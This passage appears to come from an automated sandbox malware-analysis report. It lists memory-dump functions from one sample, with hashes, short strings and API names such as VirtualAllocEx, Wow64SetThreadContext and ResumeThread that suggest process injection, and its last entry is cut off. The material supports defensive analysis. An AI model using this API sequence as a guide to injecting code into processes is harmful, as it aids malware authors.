                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0055CB00 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0055CBB2
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 31fab8a58e3bdbbb353659a34015c00804ab13a3cfeda7b4e7aa299b1386d54a
                                                          • Instruction ID: e4c93285ec7c6c32f9088baf7c64049d8fd4b8eae4c8cc70a1bf7adcafdf6df2
                                                          • Opcode Fuzzy Hash: 31fab8a58e3bdbbb353659a34015c00804ab13a3cfeda7b4e7aa299b1386d54a
                                                          • Instruction Fuzzy Hash: 974199B9D002589FCF10CFA9D984AEEFFB1BB49320F10942AE814B7200D735A945CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0055C872 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0055C922
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: c9a5da17254a00160d75bf062295bf6c8fd454b49733aaa989e1bb5a6759d4ca
                                                          • Instruction ID: da2d3a13e7b9a26aaaeef4c3b028bda9fffea795d042ecfc63726b3fb0e4c7ca
                                                          • Opcode Fuzzy Hash: c9a5da17254a00160d75bf062295bf6c8fd454b49733aaa989e1bb5a6759d4ca
                                                          • Instruction Fuzzy Hash: D54199B8D002589FCF10CFA9E984AEEFBB1BB49310F20942AE815B7314D735A945CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0055C878 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0055C922
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 6e2d0becae73d8b04b75233f3d4e321180242df595a899180be4b9a78d2f5a3c
                                                          • Instruction ID: 9df19836fe16ca05cec3ee467eb48565e6fdbad11abc6fb485cb50cc110057d9
                                                          • Opcode Fuzzy Hash: 6e2d0becae73d8b04b75233f3d4e321180242df595a899180be4b9a78d2f5a3c
                                                          • Instruction Fuzzy Hash: 814178B9D002589FCF10CFA9D984AEEFBB1BB49310F20A42AE815B7314D735A945CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0055C748 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0055C7F7
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 3dae4c770274cba626a4186cbc49e37bc591c791f7a602e960a57f02a08c7447
                                                          • Instruction ID: e8e55a56f18ea0f897477a0a1bfa1ed486a3d109d31f045af8f5faee9c42031e
                                                          • Opcode Fuzzy Hash: 3dae4c770274cba626a4186cbc49e37bc591c791f7a602e960a57f02a08c7447
                                                          • Instruction Fuzzy Hash: 09419CB5D002589FCB10CFA9D984AEEFFF1BB49314F24842AE814B7244D778A949CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0055C658 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378083063.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_550000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: dea4fad4abb21a6b3079c9c949c479d59c2227729c4af04c76709d703367f1b0
                                                          • Instruction ID: 634dda10f51f4fd5b7330d085907b403ecde36faec4ae3ab1cd251dfec45d1fe
                                                          • Opcode Fuzzy Hash: dea4fad4abb21a6b3079c9c949c479d59c2227729c4af04c76709d703367f1b0
                                                          • Instruction Fuzzy Hash: 0531B9B4D002189FCF10CFA9E984AAEFBB5BB49314F24942AE815B7300D735A905CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00348D88 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: lb8
                                                          • API String ID: 0-3242547949
                                                          • Opcode ID: 0943888639e0ede753f51adea9d3dfdeb197842f1be63635d520fa1f9fd6e10d
                                                          • Instruction ID: 91225a4b39579430795a5cd7280f60eb7993caa9610d5f4eaceff2b989722af8
                                                          • Opcode Fuzzy Hash: 0943888639e0ede753f51adea9d3dfdeb197842f1be63635d520fa1f9fd6e10d
                                                          • Instruction Fuzzy Hash: C2518C30E11308DFC741EFA8D459A6DBBF1EF85300F15C4A5D5059F266DB30AA89CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D020B Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (
                                                          • API String ID: 0-3887548279
                                                          • Opcode ID: 65dc04ae2a4f5c85a87ca449f90ce98a09eaa471ac3c10470929d2e1215693a7
                                                          • Instruction ID: eefc124d35e5f74cf7d7ffd1a1cb8df60d309260b0d6cedb9ecd6bf19206fa39
                                                          • Opcode Fuzzy Hash: 65dc04ae2a4f5c85a87ca449f90ce98a09eaa471ac3c10470929d2e1215693a7
                                                          • Instruction Fuzzy Hash: AB41F23494922CCFDB61CB64DC58BEDBBB9FB4A305F2092DAC409A6352C7315A85DF41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0034D4D8 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H+R
                                                          • API String ID: 0-1892171737
                                                          • Opcode ID: 72c84aaf127b6235ddf46c9f99c15b9401dd7278aad5636bb7e328da4b17f7e1
                                                          • Instruction ID: 7063bbbdf140d536cc963fa2827dc7d29740257b81508ab8efe540ee42b56a79
                                                          • Opcode Fuzzy Hash: 72c84aaf127b6235ddf46c9f99c15b9401dd7278aad5636bb7e328da4b17f7e1
                                                          • Instruction Fuzzy Hash: A231E8B4E04219DFCB44CFA9C5809AEBBF6FB89304F2094AAD419E7714D734AA41CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 003480C1 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: he8
                                                          • API String ID: 0-2299356406
                                                          • Opcode ID: ae21d96f8e64fde68958a979bed61b3e6a1fd24b15dc1b05aa86d451bd7595fa
                                                          • Instruction ID: d12bf74520b8e9249ec8e9cce643abb9d6f518e073aed04ff65cfd46855db27c
                                                          • Opcode Fuzzy Hash: ae21d96f8e64fde68958a979bed61b3e6a1fd24b15dc1b05aa86d451bd7595fa
                                                          • Instruction Fuzzy Hash: ABF0F432610650ABCB0AEBA8A8111DDBBE6DFC9350F10887BE50A8B220EE30550C8395
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00347EB0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: XW8
                                                          • API String ID: 0-1075238167
                                                          • Opcode ID: 65c8994fb168510adbc4420204b8bb01201208a52c19c00bf161de4c68e4b522
                                                          • Instruction ID: 7a35079dc52325501ffb0fb8f3f6856800843289f6768a4429b8df255cc30368
                                                          • Opcode Fuzzy Hash: 65c8994fb168510adbc4420204b8bb01201208a52c19c00bf161de4c68e4b522
                                                          • Instruction Fuzzy Hash: D601E975D0030DAFDB41EFE8D85169EBBB1FF48300F1089A9D015AB358EB309A559F81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D0297 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (
                                                          • API String ID: 0-3887548279
                                                          • Opcode ID: e4faa293de9df65e26c8c9eeafc00bb9d32c99d554c3f11db51b370b1d4424f1
                                                          • Instruction ID: 5c50fb2020166f2efac327a7c7c6038e28aef53c3debfb6d1aa3873a48302133
                                                          • Opcode Fuzzy Hash: e4faa293de9df65e26c8c9eeafc00bb9d32c99d554c3f11db51b370b1d4424f1
                                                          • Instruction Fuzzy Hash: F201193590A258DFDB21CB64DC44BE8BBB8FB0E308F1492CAD45DA3252C7309A95DF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 003480D0 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: he8
                                                          • API String ID: 0-2299356406
                                                          • Opcode ID: 31713cc4ad3433626a64e139c5e34cd5cb11c4ad9997a712f9857cd5199f58ce
                                                          • Instruction ID: 67d7a171a6ce2895233a04d2b700bde97994b1132ee7159cbafb690e6a4ff79e
                                                          • Opcode Fuzzy Hash: 31713cc4ad3433626a64e139c5e34cd5cb11c4ad9997a712f9857cd5199f58ce
                                                          • Instruction Fuzzy Hash: 4CE04831700A1457C716F71AD81659EF7DADFC5310750C43AF85D8B325DE7059058695
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00343E58 Relevance: .1, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: df174f7129541929a3131d8c39941f17e3cf334aed899816587944f5ee167217
                                                          • Instruction ID: 76ea41ba7883e7a39d0e033b11728002f86e30328ecf9da233dfa918ea5c9b75
                                                          • Opcode Fuzzy Hash: df174f7129541929a3131d8c39941f17e3cf334aed899816587944f5ee167217
                                                          • Instruction Fuzzy Hash: 0D414C34A003099FCB06DF64D944AAEB7B2FF88300F154569E806AB351DB70BE4ACB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0034B0A8 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f64a26f4b313d79e72731ffe1e91c0920cd3ec35c2a3232cbab0a6f0d0689a7b
                                                          • Instruction ID: e6f33933b88ef09de78264fe07279275760a79d25eaadc8e7ee2e6c682c971ae
                                                          • Opcode Fuzzy Hash: f64a26f4b313d79e72731ffe1e91c0920cd3ec35c2a3232cbab0a6f0d0689a7b
                                                          • Instruction Fuzzy Hash: 25317C70A08248CBCB01DFADCC916AEFBF8FB49311F148166D525DB691D334E940CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D01BF Relevance: .1, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abe2df4ce9c0b7e14e246cc6a7d6d01edf7808b038107938441d053560669037
                                                          • Instruction ID: 5462c3e766a90459c1dc4f9dab8a7b496d60dd7210f44ac61978e6efae7c41ca
                                                          • Opcode Fuzzy Hash: abe2df4ce9c0b7e14e246cc6a7d6d01edf7808b038107938441d053560669037
                                                          • Instruction Fuzzy Hash: C4313A34D09258CFDB24CF64E8587E8BBF5FB49305F1891EA840EA6392C7315A86CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002FD01C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376572836.00000000002FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002FD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_2fd000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9ce4acdbbc61592ac912187de782f885ddf9da8bac1c012763f0ca0ef5d0a18e
                                                          • Instruction ID: 8d9ffa3ef7c86676bd27d0d0d10bea48e0e565409eff1212f07d4c6bd574b27f
                                                          • Opcode Fuzzy Hash: 9ce4acdbbc61592ac912187de782f885ddf9da8bac1c012763f0ca0ef5d0a18e
                                                          • Instruction Fuzzy Hash: 28210075614248EFDB15CF24D880B26FB62EB84314F20C57DE90A4B246CB76D81BCBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002FD2F0 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376572836.00000000002FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002FD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_2fd000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef49cab0ac7c45abee9ea9f59f0afd6212154b700079981a45bf72f757a0fa4e
                                                          • Instruction ID: 324a703d2cb1be3fec5c977238812a49121f22e8eb7d31a0717eb4a0f2724ee9
                                                          • Opcode Fuzzy Hash: ef49cab0ac7c45abee9ea9f59f0afd6212154b700079981a45bf72f757a0fa4e
                                                          • Instruction Fuzzy Hash: F021F5B5614248DFDB01DF14D8C0B36FB62EB84314F24C5B9EA494B246C376D856CF62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002FD006 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376572836.00000000002FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002FD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_2fd000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 517ec1f54a7c0c93f7ee9ec5547d256521c0831f75e52e06a81322cc1151b33f
                                                          • Instruction ID: 70668c4574bb0b9b86dfa3092d7f8279401f82d4d240257e1a3cff97211f6bd1
                                                          • Opcode Fuzzy Hash: 517ec1f54a7c0c93f7ee9ec5547d256521c0831f75e52e06a81322cc1151b33f
                                                          • Instruction Fuzzy Hash: E2217C755093848FDB02CF24D994715BF72EB46314F28C5EAD8498B2A7C33A981ACB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00348CA8 Relevance: .1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6c5160803daade4356fc202d74fead28d7168a43ecdaf72b98631944227cb27
                                                          • Instruction ID: 73edc2d20a0f271c66cb58c07c418450ca1789e2af11e2583954b20404739640
                                                          • Opcode Fuzzy Hash: d6c5160803daade4356fc202d74fead28d7168a43ecdaf72b98631944227cb27
                                                          • Instruction Fuzzy Hash: 8B11C431A0A265CFC302DB6CD8806AEFBF4EB42710F158563E515CF292C674ED04C7A9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D016C Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c4c5b05abd3910f002669e371d1c7351352265981efc1441f3051abaf720c641
                                                          • Instruction ID: b8bb8b8409ee9195293a511d4299e3c3ec14eed55ac9370f263594fe03fdd0b5
                                                          • Opcode Fuzzy Hash: c4c5b05abd3910f002669e371d1c7351352265981efc1441f3051abaf720c641
                                                          • Instruction Fuzzy Hash: DD114934959258CFCB20CF64E8447E8BBB9FB4A315F1452E7840EE62A2C7305A86DF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00348CA5 Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 409c411a25347364104b609495185be6a1ea78f17084f570dca418e7ddc646cd
                                                          • Instruction ID: 30bbaf564483e072f6bca83d7adc707fe12006b78c4fc7b82aee0e4bdb86c827
                                                          • Opcode Fuzzy Hash: 409c411a25347364104b609495185be6a1ea78f17084f570dca418e7ddc646cd
                                                          • Instruction Fuzzy Hash: C811C431E06265CFC311DB6CD880AAEF7E8EB46B11F118626E515CF291C774EE4087A8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002FD2EB Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376572836.00000000002FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002FD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_2fd000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                          • Instruction ID: bb601725ff8ff013007e2e85231f22472e5d76aaeee681507fdca067b4d90617
                                                          • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                          • Instruction Fuzzy Hash: A611BE75504244CFDB01CF14D5C4B25FBA2EB44314F24CAA9D9494B256C33AD85ACFA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D0316 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8e114ccac0c479f99dda953706f8c96b9e00d1f3afd5d42977e162ec845d83e
                                                          • Instruction ID: 7a27e43d665eb8b2354462ef1fff60b7c6e221d441dd237e9b4a335247ec0c61
                                                          • Opcode Fuzzy Hash: e8e114ccac0c479f99dda953706f8c96b9e00d1f3afd5d42977e162ec845d83e
                                                          • Instruction Fuzzy Hash: 4411F274D18228CFCB24DF64D885BECB7B9FB09305F10819A950DE7281C7309A85CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D05AD Relevance: .0, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 01b62fce7ac2f47525ec803df59d89d2e0e4e1f19f5abdde08937130032670a7
                                                          • Instruction ID: 2cc4a90a5ec7089da1d9bac806ece9309494a971d0880b9c96fb06b0eb741531
                                                          • Opcode Fuzzy Hash: 01b62fce7ac2f47525ec803df59d89d2e0e4e1f19f5abdde08937130032670a7
                                                          • Instruction Fuzzy Hash: BB111874859268CEDB64DF24E8587E8BBB4FB09315F1492DBD409EA392C7319AC4CF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0034FE08 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f8c1ef64c7ada659bd62decbf4b97de64976daacdd3225862df4040022edb95
                                                          • Instruction ID: 13fc4bb4198eb44072b65e7a0d01a135713fab5dd4dc390f4a04655ad694d260
                                                          • Opcode Fuzzy Hash: 8f8c1ef64c7ada659bd62decbf4b97de64976daacdd3225862df4040022edb95
                                                          • Instruction Fuzzy Hash: 1001C474D002199FCB41DFA8D8856AEBFF5BB48301F6481AAD954E7355D734AA80CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D00FF Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40fc4d8c1062437966178c1ae73cba3dc741aa36d6579da106e2327e09e31f7a
                                                          • Instruction ID: d7caf9d7d69b035b4b2f968479b5989f6830a045efb14a7144e3185a6df32d78
                                                          • Opcode Fuzzy Hash: 40fc4d8c1062437966178c1ae73cba3dc741aa36d6579da106e2327e09e31f7a
                                                          • Instruction Fuzzy Hash: A8011934A84218DFEB65CB54DC45FE8B7B9FB48308F2081D69509E63C0DB70AA81DF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0034F2E0 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a9102da6158f6f58b6290b6aae17471fa75e33422f861972df865c5abbbc3599
                                                          • Instruction ID: c86ae18c3897771cbca4bf3e2a659f9279004a42ed96de7cc6c3b96895348f34
                                                          • Opcode Fuzzy Hash: a9102da6158f6f58b6290b6aae17471fa75e33422f861972df865c5abbbc3599
                                                          • Instruction Fuzzy Hash: A4016678A00208AFDB45DFA9D995A9DBFF5EF88300F19C0E5E5089B365D634DA91CF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 003449AD Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2286ba10628c145cb1f2e101dc1d91c6066fe28a42ffa3ed076c05770eb14c9d
                                                          • Instruction ID: 726070cecc606f151ef19fcb0bfd2cb2dccd7f42174e0db160f05103961a2869
                                                          • Opcode Fuzzy Hash: 2286ba10628c145cb1f2e101dc1d91c6066fe28a42ffa3ed076c05770eb14c9d
                                                          • Instruction Fuzzy Hash: 83017239610514DFCB56CB64CD48E98BBF5EF48315F0A80E5E6099B232CB71AE94DF00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 008D04DA Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.378655535.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_8d0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 26fc56d1454d409bcbf227fb2e8e3ef4dd734f4c8bb693b213db96849c6d5ab5
                                                          • Instruction ID: 3e82ac27bebd1c79a2f517195d6c0c85b8ef2b8664006534066870131c2ffbf4
